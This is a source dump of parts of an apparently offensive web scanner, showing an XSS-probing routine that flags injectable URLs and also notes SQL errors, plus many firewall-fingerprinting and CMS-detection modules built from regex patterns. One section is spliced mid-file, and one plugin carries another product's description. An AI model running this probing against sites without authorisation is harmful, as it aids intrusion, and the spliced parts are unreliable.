146 | batch = kwargs.get("batch", False)
147 | force = kwargs.get("force_ssl", False)
148 |
149 | question_msg = (
150 | "it appears that heuristic tests have shown this URL may not be a good "
151 | "candidate to perform XSS tests on, would you like to continue anyways"
152 | )
153 | if not batch:
154 | question = lib.core.common.prompt(
155 | question_msg, opts="yN"
156 | ) if not lib.core.settings.URL_QUERY_REGEX.match(start_url) else "y"
157 | else:
158 | question = lib.core.common.prompt(
159 | question_msg, opts="yN", default="y"
160 | )
161 |
162 | if not question.lower().startswith("y"):
163 | return
164 |
165 | try:
166 | if tamper:
167 | lib.core.settings.logger.info(lib.core.settings.set_color(
168 | "tampering payloads with '{}'".format(tamper)
169 | ))
170 | find_xss_script(start_url)
171 | lib.core.settings.logger.info(lib.core.settings.set_color(
172 | "loading payloads"
173 | ))
174 | payloads = __load_payloads()
175 | if verbose:
176 | lib.core.settings.logger.debug(lib.core.settings.set_color(
177 | "a total of {} payloads loaded".format(len(payloads)), level=10
178 | ))
179 | lib.core.settings.logger.info(lib.core.settings.set_color(
180 | "payloads will be written to a temporary file and read from there"
181 | ))
182 | filename = create_urls(start_url, payloads, tamper=tamper, verbose=verbose, force=force)
183 | lib.core.settings.logger.info(lib.core.settings.set_color(
184 | "loaded URL's have been saved to '{}'".format(filename), level=25
185 | ))
186 | lib.core.settings.logger.info(lib.core.settings.set_color(
187 | "testing for XSS vulnerabilities on host '{}'".format(start_url)
188 | ))
189 | if proxy is not None:
190 | lib.core.settings.logger.info(lib.core.settings.set_color(
191 | "using proxy '{}'".format(proxy)
192 | ))
193 | success = set()
194 | with open(filename) as urls:
195 | for i, url in enumerate(urls.readlines(), start=1):
196 | url = url.strip()
197 | payload = find_xss_script(url)
198 | try:
199 | result = scan_xss(url, proxy=proxy, agent=agent)
200 | if verbose:
201 | lib.core.settings.logger.info(lib.core.settings.set_color(
202 | "trying payload '{}'".format(payload)
203 | ))
204 | if result[0] != "sqli" and result[0] is True:
205 | success.add(url)
206 | if verbose:
207 | lib.core.settings.logger.debug(lib.core.settings.set_color(
208 | "payload '{}' appears to be usable".format(payload), level=15
209 | ))
210 | elif result[0] is "sqli":
211 | if i <= 1:
212 | lib.core.settings.logger.error(lib.core.settings.set_color(
213 | "loaded URL '{}' threw a DBMS error and appears to be injectable, test for "
214 | "SQL injection, backend DBMS appears to be '{}'".format(
215 | url, result[1]
216 | ), level=40
217 | ))
218 | else:
219 | if verbose:
220 | lib.core.settings.logger.error(lib.core.settings.set_color(
221 | "SQL error discovered", level=40
222 | ))
223 | else:
224 | if verbose:
225 | lib.core.settings.logger.debug(lib.core.settings.set_color(
226 | "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'".format(
227 | start_url, payload
228 | ), level=10
229 | ))
230 | except (
231 | requests.exceptions.ConnectionError,
232 | requests.exceptions.TooManyRedirects,
233 | requests.exceptions.ReadTimeout,
234 | requests.exceptions.InvalidURL
235 | ):
236 | if not payload == "":
237 | lib.core.settings.logger.error(lib.core.settings.set_color(
238 | "payload '{}' caused a connection error, assuming no good and continuing".format(payload), level=40
239 | ))
240 |
241 | if len(success) != 0:
242 | lib.core.settings.logger.info(lib.core.settings.set_color(
243 | "possible XSS scripts to be used:", level=25
244 | ))
245 | lib.core.settings.create_tree(start_url, list(success))
246 | else:
247 | lib.core.settings.logger.error(lib.core.settings.set_color(
248 | "host '{}' does not appear to be vulnerable to XSS attacks".format(start_url), level=40
249 | ))
250 | question_msg = "would you like to keep the created URLs saved for further testing"
251 | if not batch:
252 | save = lib.core.common.prompt(
253 | question_msg, opts="yN"
254 | )
255 | else:
256 | save = lib.core.common.prompt(
257 | question_msg, opts="yN", default="n"
258 | )
259 |
260 | if save.lower().startswith("n"):
261 | os.remove(filename)
262 | else:
263 | os.remove(filename)
264 | except KeyboardInterrupt:
265 | if not lib.core.common.pause():
266 | lib.core.common.shutdown()
--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/core/__init__.py
--------------------------------------------------------------------------------
/lib/core/decorators.py:
--------------------------------------------------------------------------------
1 | import signal
2 | from functools import wraps
3 |
4 | import lib.core.errors
5 | import lib.core.settings
6 |
7 |
8 | class TimeOut:
9 |
10 | def __init__(self, seconds=1, error_message='Timeout'):
11 | self.seconds = seconds
12 | self.error_message = error_message
13 |
14 | def handle_timeout(self, signum, frame):
15 | raise lib.core.errors.PortScanTimeOutException(self.error_message)
16 |
17 | def __enter__(self):
18 | signal.signal(signal.SIGALRM, self.handle_timeout)
19 | signal.alarm(self.seconds)
20 |
21 | def __exit__(self, type_, value, traceback):
22 | signal.alarm(0)
23 |
24 |
25 | def cache(func):
26 | """
27 | if we come across the same URL more then once, it will be cached into memory
28 | so that we don't have to test it again
29 | """
30 | __cache = {}
31 |
32 | @wraps(func)
33 | def func_wrapper(*args, **kwargs):
34 | if args in __cache:
35 | return __cache[args]
36 | else:
37 | __to_cache = func(*args, **kwargs)
38 | __cache[args] = __to_cache
39 | return __to_cache
40 |
41 | return func_wrapper
42 |
--------------------------------------------------------------------------------
/lib/core/errors.py:
--------------------------------------------------------------------------------
1 | class InvalidProxyType(Exception): pass
2 |
3 |
4 | class ApiConnectionError(Exception): pass
5 |
6 |
7 | class ApplicationNotFound(Exception): pass
8 |
9 |
10 | class SqlmapFailedStart(Exception): pass
11 |
12 |
13 | class SpiderTestFailure(Exception): pass
14 |
15 |
16 | class InvalidInputProvided(Exception): pass
17 |
18 |
19 | class InvalidTamperProvided(Exception): pass
20 |
21 |
22 | class PortScanTimeOutException(Exception): pass
23 |
24 |
25 | class ZeusArgumentException(Exception): pass
--------------------------------------------------------------------------------
/lib/firewall/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/firewall/__init__.py
--------------------------------------------------------------------------------
/lib/firewall/akamai.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "AkamaiGHost Website Protection (Akamai Global Host)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"you.don.t.have.permission.to.access", re.I),
14 | re.compile(r"<.+>access.denied<.+.>", re.I),
15 | )
16 | for detection in detection_schema:
17 | if detection.search(content) is not None:
18 | if re.compile(r"\bakamaighost", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 | if re.compile(r"\bak.bmsc.", re.I).search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
21 | return True
22 |
--------------------------------------------------------------------------------
/lib/firewall/anquanbao.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Anquanbao Web Application Firewall (Anquanbao)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | content = str(content)
10 | detection_scehmas = (re.compile(r"/aqb_cc/error/"), )
11 | if headers is not None:
12 | for detection in detection_scehmas:
13 | if detection.search(content) is not None:
14 | return True
15 | try:
16 | if re.compile(r"MISS").search(headers.get("X-Powered-By-Anquanbao")) is not None:
17 | return True
18 | except Exception:
19 | pass
20 |
--------------------------------------------------------------------------------
/lib/firewall/armor.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Armor Protection (Armor Defense)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"\barmor\b", re.I),
11 | re.compile(r"blocked.by.website.protection.from.armour", re.I)
12 | )
13 | for detection in detection_schema:
14 | if detection.search(content) is not None:
15 | return True
16 |
--------------------------------------------------------------------------------
/lib/firewall/aws.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Amazon Web Services Web Application Firewall (Amazon)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"[0-9a-zA-Z]{16,25}<.RequestId>", re.I),
14 | re.compile(r"AccessDenied<.Code>", re.I),
15 | re.compile(r"\bAWS", re.I),
16 | re.compile(r"x.amz.id.\d+", re.I),
17 | re.compile(r"x.amz.request.id", re.I),
18 | re.compile(r"amazon.\d+", re.I)
19 | )
20 | for detection in detection_schema:
21 | if detection.search(content) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 | if detection.search(headers.get(HTTP_HEADER.X_POWERED_BY, "")) is not None:
26 | return True
27 |
--------------------------------------------------------------------------------
/lib/firewall/bigip.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "BIG-IP Application Security Manager (F5 Networks)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"\ATS\w{4,}=", re.I), re.compile(r"BIGip|BipServer", re.I),
13 | re.compile(r"\AF5\Z", re.I)
14 | )
15 | for detection in detection_schema:
16 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/cloudflare.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "CloudFlare Web Application Firewall (CloudFlare)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schemas = (
13 | re.compile(r"CloudFlare Ray ID:|var CloudFlare=", re.I),
14 | re.compile(r"cloudflare-nginx", re.I),
15 | re.compile(r"\A__cfduid=", re.I),
16 | re.compile(r"CF_RAY", re.I)
17 | )
18 | for detection in detection_schemas:
19 | if detection.search(content) is not None:
20 | return True
21 | elif detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
22 | return True
23 | elif detection.search(headers.get(HTTP_HEADER.COOKIE, "")) is not None:
24 | return True
25 | elif detection.search(str(headers)) is not None:
26 | return True
27 |
--------------------------------------------------------------------------------
/lib/firewall/cloudfront.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "CloudFront Firewall (Amazon)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | detection_schema = (
10 | re.compile(r"\d.\d.[a-zA-Z0-9]{32,60}.cloudfront.net", re.I),
11 | re.compile(r"cloudfront", re.I),
12 | re.compile(r"X-Amz-Cf-Id", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(str(headers)) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/dw.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "DynamicWeb Injection Check (DynamicWeb)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | status = kwargs.get("status", None)
10 | detection_schema = (
11 | re.compile(r"dw.inj.check", re.I),
12 | )
13 | if status == 403:
14 | for detection in detection_schema:
15 | if detection.search(headers.get("X-403-status-by", "")) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/fortigate.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "FortiWeb Web Application Firewall (Fortinet)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"<.+>powered.by.fortinet<.+.>", re.I),
14 | re.compile(r"<.+>fortigate.ips.sensor<.+.>", re.I),
15 | re.compile(r"fortigate", re.I), re.compile(r".fgd_icon", re.I),
16 | re.compile(r"\AFORTIWAFSID=", re.I)
17 | )
18 | for detection in detection_schema:
19 | if detection.search(content) is not None:
20 | return True
21 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
22 | return True
23 |
--------------------------------------------------------------------------------
/lib/firewall/generic.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 | from lib.core.settings import PROTECTION_CHECK_PAYLOAD
5 |
6 |
7 | __item__ = "Generic (Unknown)"
8 |
9 |
10 | def detect(content, **kwargs):
11 | content = str(content)
12 | headers = kwargs.get("headers", None)
13 | status = kwargs.get("status", None)
14 | if status == 403:
15 | # if the error HTML is an Apache error, Apache has a tendency to be fucking stupid
16 | # and output 403 errors when you are trying to do something fun. mostly because
17 | # Apache is a killer of fun and doesn't like anything decent in this life.
18 | if re.compile(r"<.+>403 Forbidden<.+.>", re.I).search(content) is not None:
19 | return False
20 | if re.compile(r"apache.\d+", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return False
22 | # make sure that it's not just a `didn't find what you're looking for` page
23 | # this will probably help out a lot with random WAF detection
24 | if status == 200 or "not found" in content.lower():
25 | return False
26 | detection_schema = (
27 | re.compile("blocked", re.I), re.compile("forbidden", re.I),
28 | re.compile("illegal", re.I), re.compile("reported", re.I),
29 | re.compile("ip.logged", re.I), re.compile("access.denied", re.I),
30 | re.compile("ip.address.logged", re.I), re.compile(r"not.acceptable")
31 | )
32 | for detection in detection_schema:
33 | if detection.search(content) is not None:
34 | return True
35 | if PROTECTION_CHECK_PAYLOAD in content:
36 | return True
37 |
--------------------------------------------------------------------------------
/lib/firewall/modsecurity.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "ModSecurity: Open Source Web Application Firewall"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"ModSecurity|NYOB", re.I),
11 | re.compile(r"Mod Security", re.I),
12 | re.compile(r"mod_security", re.I),
13 | re.compile(r"This error was generated by Mod_Security", re.I),
14 | re.compile(r"Web Server at", re.I),
15 | re.compile(r"page you are (accessing|trying)? (to|is)? (access)? (is|to)? (restricted)?", re.I)
16 | )
17 | for detection in detection_schema:
18 | if detection.search(content) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/paloalto.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Palo Alto Firewall (Palo Alto Networks)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schemas = (
10 | re.compile(r"\bhas been blocked in accordance with company policy\b"),
11 | re.compile(r"<.+>Virus.Spyware.Download.Blocked<.+.>")
12 | )
13 | for detection in detection_schemas:
14 | if detection.search(content) is not None:
15 | return True
16 |
17 |
--------------------------------------------------------------------------------
/lib/firewall/pk.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "pkSecurityModule (IDS)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"<.+>pkSecurityModule\W..\WSecurity.Alert<.+.>", re.I),
11 | re.compile(r"<.+http(s)?.//([w]{3})?.kitnetwork.\w+.+>", re.I),
12 | re.compile(r"<.+>A.safety.critical.request.was.discovered.and.blocked.<.+.>", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(content) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/powerful.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Powerful Firewall (MyBB plugin)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | status = kwargs.get("status", None)
9 | detection_schema = (
10 | re.compile(r"Powerful Firewall", re.I),
11 | re.compile(r"http(s)?...tiny.cc.powerful.firewall", re.I)
12 | )
13 | if status is not None:
14 | if status == 403:
15 | for detection in detection_schema:
16 | if detection.search(content) is not None:
17 | return True
18 |
--------------------------------------------------------------------------------
/lib/firewall/siteguard.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Website Security SiteGuard (Lite)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r">Powered.by.SiteGuard.Lite<", re.I),
11 | re.compile(r"refuse.to.browse", re.I)
12 | )
13 | for detection in detection_schema:
14 | if detection.search(content) is not None:
15 | return True
16 |
--------------------------------------------------------------------------------
/lib/firewall/sonicwall.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "SonicWALL Firewall (Dell)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"This.request.is.blocked.by.the.SonicWALL", re.I),
14 | re.compile(r"Dell.SonicWALL", re.I),
15 | re.compile(r"\bDell\b", re.I),
16 | re.compile(r"Web.Site.Blocked.+\bnsa.banner", re.I),
17 | re.compile(r"SonicWALL", re.I),
18 | re.compile(r"<.+>policy.this.site.is.blocked<.+.>", re.I)
19 | )
20 | for detection in detection_schema:
21 | if detection.search(content) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 |
--------------------------------------------------------------------------------
/lib/firewall/squid.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Squid Proxy (IDS)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"squid", re.I),
14 | re.compile(r"Access control configuration prevents", re.I),
15 | re.compile(r"X.Squid.Error", re.I),
16 | )
17 | for detection in detection_schema:
18 | if detection.search(content) is not None:
19 | return True
20 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return True
22 | if detection.search(str(headers)) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/firewall/stringray.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Stingray Application Firewall (Riverbed / Brocade)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | status = kwargs.get("status", None)
12 | status_schema = (403, 500)
13 | detection_schema = (
14 | re.compile(r"\AX-Mapping-", re.I),
15 | )
16 | for detection in detection_schema:
17 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
18 | if status in status_schema:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/sucuri.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 | __item__ = "Sucuri Firewall (Sucuri Cloudproxy)"
6 |
7 |
8 | def detect(content, **kwargs):
9 | content = str(content)
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"Access Denied - Sucuri Website Firewall"),
13 | re.compile(r"Sucuri WebSite Firewall - CloudProxy - Access Denied"),
14 | re.compile(r"Questions\?.+cloudproxy@sucuri\.net")
15 | )
16 | for detection in detection_schema:
17 | if detection.search(content) is not None:
18 | return True
19 | if re.compile(r"X-Sucuri-ID", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/firewall/urlscan.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "UrlScan (Microsoft)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"rejected.by.url.scan", re.I),
13 | re.compile(r"/rejected.by.url.scan", re.I)
14 | )
15 | for detection in detection_schema:
16 | if detection.search(content) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.LOCATION, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/varnish.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Varnish FireWall (OWASP)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"\bXID: \d+", re.I),
14 | re.compile(r"varnish\Z", re.I),
15 | re.compile(r"varnish"), re.I
16 | )
17 | try:
18 | for detection in detection_schema:
19 | if detection.search(content) is not None:
20 | return True
21 | if detection.search(headers.get(HTTP_HEADER.VIA, "")) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 | except:
26 | pass
27 |
--------------------------------------------------------------------------------
/lib/firewall/wallarm.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Wallarm Web Application Firewall (Wallarm)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"nginx-wallarm", re.I),
13 | )
14 | for detection in detection_schema:
15 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/webknight.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "WebKnight Application Firewall (AQTRONIX)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | status = kwargs.get("status", None)
12 | detection_schema = (
13 | re.compile(r"webknight", re.I),
14 | re.compile(r"WebKnight", re.I)
15 | )
16 | if status is not None:
17 | if status == 999:
18 | return True
19 | for detection in detection_schema:
20 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return True
22 |
--------------------------------------------------------------------------------
/lib/firewall/webseal.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "IBM Security Access Manager (WebSEAL)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"\bWebSEAL\b", re.I), re.compile(r"\bIBM\b", re.I)
11 | )
12 | for detection in list(detection_schema):
13 | if detection.search(content) is not None:
14 | return True
15 |
--------------------------------------------------------------------------------
/lib/firewall/wordfence.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Wordfence (Feedjit)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"Generated by Wordfence", re.I),
11 | re.compile(r"Your access to this site has been limited", re.I),
12 | re.compile(r"<.+>Wordfence<.+.>", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(content) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/yundun.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Yundun Web Application Firewall (Yundun)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"YUNDUN", re.I),
13 | )
14 | if headers is not None:
15 | for detection in detection_schema:
16 | if detection.search(headers.get(HTTP_HEADER.X_CACHE, "")) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/yunsuo.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Yunsuo Web Application Firewall (Yunsuo)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"
powered.by.1024.cms<.+.>", re.I),
20 | re.compile(r"1024.cms", re.I)
21 | )
22 | for plugin in plugin_detection_schema:
23 | if plugin.search(html) is not None:
24 | return True
25 |
--------------------------------------------------------------------------------
/lib/plugins/360.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "360 Web Manager"
5 | __description__ = (
6 | "1024 is one of a few CMS's leading the way with the "
7 | "implementation of the AJAX technology into all its "
8 | "areas. This includes dynamic adminstration and user "
9 | "interaction. 1024 offers you to ability to set up your "
10 | "own community forums, download area, news posts, member management and more."
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | plugin_detection_schema = (
17 | re.compile(r"powered.by.360.web.manager", re.I),
18 | re.compile(r"360webmanager.software", re.I),
19 | re.compile(r"http(s)?.\S{2}(www.)?360webmanager(.com)?", re.I),
20 | )
21 | for plugin in plugin_detection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/plugins/3com.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "3COM-NBX"
5 | __description__ = (
6 | "3COM NBX phone system. The NBX NetSet utility is a web "
7 | "interface in which you configure and manage the NBX "
8 | "system. NBX systems present the NBX NetSet utility "
9 | "through an embedded web server that is integrated in system software."
10 | )
11 |
12 |
13 | def search(html, **kwargs):
14 | html = str(html)
15 | plugin_detection_schema = (
16 | re.compile(r"nbx.netset", re.I),
17 | re.compile(r"<.+>nbx.netset<.+.>", re.I),
18 | re.compile(r"3com.corporation", re.I),
19 | re.compile(r"nbx.corporation", re.I),
20 | re.compile(r"http(s)?.//(www.)?nbxhelpdesk.com", re.I),
21 | re.compile(r"nbx.help.desk", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(html) is not None:
25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/3dcart.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "3dcart"
7 | __description__ = (
8 | "The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone."
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | headers = kwargs.get("headers", None)
15 | plugin_detection_schema = (
16 | re.compile(r"3dcart.stats", re.I),
17 | re.compile(r"/3dvisit/", re.I)
18 | )
19 | for plugin in plugin_detection_schema:
20 | if plugin.search(html) is not None:
21 | return True
22 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/plugins/4d.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "4D"
7 | __description__ = (
8 | "4D web application deployment server"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | headers = kwargs.get("headers", None)
14 | plugin_detection_schema = (
15 | re.compile(r"/^4D_v[\d]{1,2}(_SQL)?\/([\d\.]+)$/", re.I),
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/4images.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "4images"
5 | __description__ = (
6 | "4images is a powerful web-based image gallery "
7 | "management system. Features include comment system, "
8 | "user registration and management, password protected "
9 | "administration area with browser-based upload and HTML "
10 | "templates for page layout and design."
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | plugin_protection_schema = (
17 | re.compile(r"http(s)?.//(www.)?4homepages.\w+", re.I),
18 | re.compile(r"powered.by.<.+>4images<.+.>", re.I),
19 | re.compile(r"powered.by.4images", re.I)
20 | )
21 | for plugin in plugin_protection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/plugins/68classified.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "68-Classifieds-Script"
5 | __description__ = (
6 | "68 Classifieds Script - Requires PHP"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"http(s)?.//(www.)?68classifieds.com", re.I),
14 | re.compile(r"68.classifieds.script", re.I),
15 | re.compile(r"68.classifieds", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/plugins/__init__.py
--------------------------------------------------------------------------------
/lib/plugins/aardvark.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Aardvark-Topsites-PHP"
5 | __description__ = (
6 | "Aardvark Topsites PHP is a free topsites script built on PHP and MySQL"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"powered.by.aardvark.topsites.php", re.I),
14 | re.compile(r"aardvark.topsites.php", re.I),
15 | re.compile(r"http(s)?.//(www.)?aardvarktopsitesphp.com", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/abyss.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Abyss-Web-Server"
7 | __description__ = (
8 | "Abyss Web Server is a compact web server available "
9 | "for Windows, Mac OS X, Linux, and FreeBSD operating systems"
10 | )
11 |
12 |
13 | def search(html, **kwargs):
14 | headers = kwargs.get("headers", None)
15 | plugin_detection_schema = (
16 | re.compile(r"/^Abyss\/([^\s]+)/", re.I),
17 | )
18 | for plugin in plugin_detection_schema:
